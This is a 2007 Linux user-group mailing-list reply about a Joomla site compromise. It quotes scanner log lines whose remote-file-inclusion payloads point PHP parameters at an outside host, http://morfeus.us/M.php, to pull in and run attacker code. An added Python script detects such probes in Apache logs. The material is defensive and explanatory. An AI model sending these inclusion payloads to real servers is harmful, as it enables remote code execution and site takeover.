PLUG site incident last night

JD Austin jd at twingeckos.com
Mon Jan 1 17:25:44 MST 2007


Using URL tricks, crackers exploit many types of web applications.  
The register_globals feature in PHP is used to trick the site into using 
a different configuration .php file in another location across the net 
and running it.  It's a trick as old as CGI.
Looking at my logs I see TONS of these types of attempts:

    208.31.216.8 - - [01/Jan/2007:08:59:52 -0500] "GET /becommunity/community/index.php?pageurl=http://morfeus.us/M.php?&/ HTTP/1.1" 404 1244 "-" "Morfeus FXXXking Scanner"
    208.31.216.8 - - [01/Jan/2007:08:59:53 -0500] "GET /shoutbox/expanded.php?conf=http://morfeus.us/M.php?&/ HTTP/1.1" 404 1244 "-" "Morfeus FXXXking Scanner"
    208.31.216.8 - - [01/Jan/2007:08:59:56 -0500] "GET /dotproject/modules/tasks/addedit.php?root_dir=http://morfeus.us/M.php?&/ HTTP/1.1" 200 176 "-" "Morfeus FXXXking Scanner"
    208.31.216.8 - - [01/Jan/2007:09:00:00 -0500] "GET /My_eGallery/public/displayCategory.php?basepath=http://morfeus.us/M.php?&/ HTTP/1.1" 404 1244 "-" "Morfeus FXXXking Scanner"
    208.31.216.8 - - [01/Jan/2007:09:02:09 -0500] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=http://morfeus.us/M.php?&/ HTTP/1.1" 403 1240 "-" "Morfeus FXXXing Scanner"


It was never an issue with Joomla itself, but third-party components and 
modules coded by people less security-minded have been exploited.  
com_extcalendar, com_galeria and a few others were commonly used to 
overwrite the index.php and configuration.php files.  From there they'd 
use PHP to create and run shell scripts to do various malicious things.

Components should have this in them somewhere:

    defined( '_VALID_MOS' ) or die( 'Restricted access' );

Since Joomla 1.0.11 this issue has been addressed using .htaccess and 
re-coding to allow register_globals to be turned off.  Since Joomla is 
used on a wide range of platforms (even Windows) they still support the 
old register_globals method of variables but try to coerce users into 
setting it up right.

I also install mod_security to make that sort of attack stop in its tracks.

JD
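The probes in JD's log excerpt all share one signature: a query parameter whose value is itself a URL (the classic register_globals remote file inclusion pattern, where a trusting script ends up doing include() on an attacker-supplied path). The following Python is an added example, not code from JD's post, from Joomla or from any of the named components; it parses Apache combined-format lines, flags any request carrying a URL-valued parameter, and pulls out the ones the server answered with 200 for triage first. The five sample lines are the requests quoted above rejoined onto single lines; the sixth is a constructed benign request used as a control, and the log format regex is the standard combined format, which is an assumption about how the server was configured.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" log format (assumed; it matches the lines quoted in the post).
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# A parameter value that is itself a URL is the signature of a remote file
# inclusion probe: with register_globals on, the value lands in a PHP variable
# such as $mosConfig_absolute_path, and any script that does
# include("$mosConfig_absolute_path/configuration.php") fetches and runs the
# attacker's file (when allow_url_fopen is on).
REMOTE_SCHEME_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if m is None:
        return None
    rec = m.groupdict()
    split = urlsplit(rec['target'])
    rec['path'] = split.path
    # keep_blank_values keeps the trailing "/" the scanner appends ("...M.php?&/")
    rec['params'] = parse_qsl(split.query, keep_blank_values=True)
    return rec


def rfi_params(rec):
    """Return the (name, value) pairs whose value points at a remote host."""
    return [(n, v) for n, v in rec['params'] if REMOTE_SCHEME_RE.match(v)]


def scan(lines):
    """Return one finding per request that carries a URL-valued parameter."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = rfi_params(rec)
        if hits:
            findings.append({
                'host': rec['host'],
                'path': rec['path'],
                'status': int(rec['status']),
                'agent': rec['agent'],
                'params': hits,
            })
    return findings


def triage(findings):
    """Probes answered with 200 reached a script that exists and processed the
    request, so they are checked first.  A 200 on its own does not prove the
    remote file was actually included; it narrows where to look."""
    return [f for f in findings if f['status'] == 200]


# Sample input: the five requests quoted in the post, each rejoined onto one
# line, plus one constructed benign request as a control (last entry).
SAMPLE_LINES = [
    '208.31.216.8 - - [01/Jan/2007:08:59:52 -0500] "GET /becommunity/community/index.php?pageurl=http://morfeus.us/M.php?&/ HTTP/1.1" 404 1244 "-" "Morfeus FXXXking Scanner"',
    '208.31.216.8 - - [01/Jan/2007:08:59:53 -0500] "GET /shoutbox/expanded.php?conf=http://morfeus.us/M.php?&/ HTTP/1.1" 404 1244 "-" "Morfeus FXXXking Scanner"',
    '208.31.216.8 - - [01/Jan/2007:08:59:56 -0500] "GET /dotproject/modules/tasks/addedit.php?root_dir=http://morfeus.us/M.php?&/ HTTP/1.1" 200 176 "-" "Morfeus FXXXking Scanner"',
    '208.31.216.8 - - [01/Jan/2007:09:00:00 -0500] "GET /My_eGallery/public/displayCategory.php?basepath=http://morfeus.us/M.php?&/ HTTP/1.1" 404 1244 "-" "Morfeus FXXXking Scanner"',
    '208.31.216.8 - - [01/Jan/2007:09:02:09 -0500] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=http://morfeus.us/M.php?&/ HTTP/1.1" 403 1240 "-" "Morfeus FXXXing Scanner"',
    '10.0.0.5 - - [01/Jan/2007:09:05:00 -0500] "GET /index.php?option=com_content&task=view&id=12 HTTP/1.1" 200 8123 "-" "Mozilla/5.0 (constructed control line)"',
]


if __name__ == '__main__':
    found = scan(SAMPLE_LINES)
    for f in found:
        print(f['status'], f['host'], f['path'], f['params'], repr(f['agent']))
    print('triage first:', [f['path'] for f in triage(found)])
```

Run against the six sample lines it reports the five Morfeus probes and ignores the control request; the only 200 is the dotproject addedit.php probe, which is the one to examine on disk. Matching on the URL-valued parameter rather than on the "Morfeus" user-agent string is deliberate: the agent string is trivially changed, the parameter shape is what the attack needs.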

Technomage wrote:
> this may sound like a stupid question on my part (sorry guys, I've been 
> working lately, so I haven't kept up): what exactly was cracked on the site 
> and how was it done?
>
> details would be greatly appreciated.
>
> thanks.
>
>
> On Monday 01 January 2007 04:29, Jim wrote:
>   
>> Edward Norton wrote:
>>     
>>> PLUG cracked AGAIN? Not surprising considering you guys won't consider
>>> anything other than a badly coded PHP CMS.
>>>       
>> Ed,
>>
>> Apparently you know more about securing a site than the people who run
>> it.  At least that's what your message implies.  I have an idea.  When
>> it's time for the next PLUG meeting, come out of the sewer, show up at
>> the meeting and offer to help secure the site.
>>     
> ---------------------------------------------------
> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
> To subscribe, unsubscribe, or to change your mail settings:
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>   